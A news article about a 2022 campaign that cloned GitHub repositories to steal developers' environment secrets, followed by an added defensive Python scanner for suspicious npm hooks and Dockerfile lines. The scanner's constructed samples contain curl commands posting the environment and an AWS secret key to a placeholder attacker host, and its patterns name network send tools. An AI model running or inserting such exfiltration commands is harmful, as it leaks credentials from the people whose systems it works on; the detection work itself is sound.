The developer who discovered the vulnerability asked other developers to sign their revisions with their GPG keys so that a project's revision history can be verified.
On a day when thousands of wallets with Solana addresses had millions of dollars’ worth of funds stolen, the important developer platform GitHub came under a pervasive malware attack and reported 35,000 “code hits.”
Stephen Lacy, a GitHub developer who first reported the incident earlier on Wednesday, highlighted the attack's broad reach. He discovered the problem while looking over a project he had found via Google.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs
— Stephen Lacy (@stephenlacy), August 3, 2022
The attack has so far been found to affect a range of projects, including crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes. The malicious code is inserted into NPM scripts (a convenient way to group a project's common shell commands), install documentation, and Docker images.
The attacker first creates a fake repository (a repository holds all of a project's files together with each file's revision history) by pushing a clone of a legitimate project to GitHub, in order to trick developers and gain access to sensitive data. The following two screenshots, for instance, show a legitimate crypto-miner project and its clone.
Many of these clone repositories were pushed as "pull requests," the GitHub mechanism that lets developers tell others about changes they have pushed to a branch in a repository.
As soon as a developer runs the malicious code, the entire environment (ENV) of the script, application, or laptop (in the case of Electron apps) is sent to the attacker's server. The environment typically holds a variety of secrets, such as Amazon Web Services access keys, crypto keys, and security keys.
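As an added example (not code from the article, from Stephen Lacy, or from GitHub), the following Python script shows one defender-side check for the pattern just described: npm lifecycle hooks and Dockerfile RUN lines that read the environment and send it to a remote host. The package.json and Dockerfile samples are constructed, and the attacker hostname is a placeholder.

```python
"""Heuristic scanner for install-time scripts that read the process
environment and ship it to a remote host. Added example, not code from the
article or from GitHub; the sample inputs below are constructed."""
import json
import re

# Commands that dump the whole environment or expand secrets into a command line.
ENV_READ = re.compile(r"\b(env|printenv|set)\b|\$\{?[A-Z_]{3,}\}?|process\.env")
# Tools commonly used to push data off the host.
NET_SEND = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")
# npm hooks that run automatically on `npm install` without the user asking.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def suspicious_command(cmd: str) -> bool:
    """A command is flagged when it both reads environment data and sends traffic."""
    return bool(ENV_READ.search(cmd) and NET_SEND.search(cmd))


def scan_package_json(text: str) -> list[str]:
    """Return the names of npm lifecycle scripts that look like env exfiltration."""
    scripts = json.loads(text).get("scripts", {})
    return [name for name in NPM_HOOKS
            if name in scripts and suspicious_command(scripts[name])]


def scan_dockerfile(text: str) -> list[int]:
    """Return 1-based line numbers of RUN instructions that look like env exfiltration."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.strip().upper().startswith("RUN ") and suspicious_command(line):
            hits.append(lineno)
    return hits


# Constructed samples: one benign script, one hook that posts the environment.
SAMPLE_PACKAGE_JSON = json.dumps({"scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s -X POST -d \"$(env | base64)\" https://attacker.example/collect",
}})
SAMPLE_DOCKERFILE = """FROM node:18
RUN npm ci
RUN curl -d "$AWS_SECRET_ACCESS_KEY" https://attacker.example/k
CMD ["node", "index.js"]
"""

if __name__ == "__main__":
    print("npm hooks flagged:", scan_package_json(SAMPLE_PACKAGE_JSON))   # ['postinstall']
    print("Dockerfile lines flagged:", scan_dockerfile(SAMPLE_DOCKERFILE))  # [3]
```

The heuristic is deliberately narrow; treat a hit as a prompt to read the script by hand rather than as proof of compromise.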
The developer has reported the problem to GitHub and advised developers to GPG-sign every revision they make to a repository. GPG signatures provide a way to confirm that all revisions come from a trusted source, adding an extra layer of security to GitHub accounts and software projects.